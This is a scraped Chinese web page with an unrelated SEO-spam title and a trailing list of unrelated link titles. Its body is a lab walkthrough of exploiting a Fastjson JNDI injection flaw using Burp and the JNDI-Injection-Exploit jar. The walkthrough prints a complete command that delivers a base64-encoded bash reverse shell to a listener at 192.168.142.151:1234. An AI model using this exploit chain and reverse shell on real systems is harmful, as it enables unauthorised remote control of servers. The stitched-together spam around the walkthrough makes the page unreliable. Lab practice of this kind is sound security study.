当前位置: 首页 > news >正文

上海所有公司名称seow是什么意思

上海所有公司名称,seow是什么意思,平度推广网站建设,强化乡镇政府网站建设和管理拉取docker容器 访问并抓包 修改为POST 方式,文件类型改为json格式,发送json数据包,发送成功 这里安装一个bp的插件 使用安装的插件 可以看到,插件告诉我们这里有漏洞,并且提供了POC 既然我们发现有 rmi ,…

拉取docker容器

访问并抓包

修改为POST 方式,文件类型改为json格式,发送json数据包,发送成功

这里安装一个bp的插件

使用安装的插件

可以看到,插件告诉我们这里有漏洞,并且提供了POC 

既然我们发现有 rmi ,那么我们需要构建一个 rmi 服务器 [ JNDI ]
sudo wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
使用这个工具创建一个文件夹,如果文件夹创建成功就表示可以利用
将payload复制到bp
生成了文件夹
对反弹shell进行base64编码
把上面的反弹 shell 进行 base64 编码,然后修改成
bash -c {echo, 你的 base64 编码结果 }|{base64,-d}|{bash-i}
开启监听。然后输入命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNTEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.142.151"
成功获得反弹shell2
http://www.zhongyajixie.com/news/53890.html

相关文章:

  • 使用html做网站的网页今日军事新闻报道
  • 网站推广工作今天发生的重大新闻
  • 鄂尔多斯网站建设网推怎么做最有效
  • 日照网站建设官方网站排超最新积分榜
  • 重庆市建设工程造价信息网官方如何优化关键词搜索排名
  • 网站开发建设费用网络营销是什么专业类别
  • 怎么做卖保险的网站市场营销师报名官网
  • 网站展示模板关键词搜索排名软件
  • 昆明网站建设制作数据分析工具
  • 专业做淘宝网站公司哪家好在百度上怎么发布广告
  • dedecms建手机网站河北seo基础教程
  • 网站建设自主建设谷歌搜索入口手机版
  • 哪里有做证武汉seo首页
  • 网站建设公司每年可以做多少个网站seo的目的是什么
  • 电商网站开发背景希爱力的功效及副作用
  • 网站加视频播放设计怎么做的黄金网站app视频播放画质选择
  • 网站开发 周期郑州网络推广方法
  • 西宁网站建设电话市场营销策划公司
  • 做网站赔了8万关键词的优化和推广
  • 做教育网站的公司seo推广优化排名软件
  • 红杉网站建设推广普通话心得体会
  • 做图片视频的网站石家庄疫情最新情况
  • 怎么做原创动漫视频网站西seo优化排名
  • 当今做啥网站能致富大型门户网站建设
  • 旅游网站设计的优点山东网站seo推广优化价格
  • wordpress ppt插件seo研究中心好客站
  • 望都网站建设广告公司接单软件
  • 大连做网站的公司有哪些云和数据培训机构怎么样
  • 网站怎么做图片转换资阳市网站seo
  • 活动4 第1步 【学习】建设主题资源网站的一些建议测试网站运营专员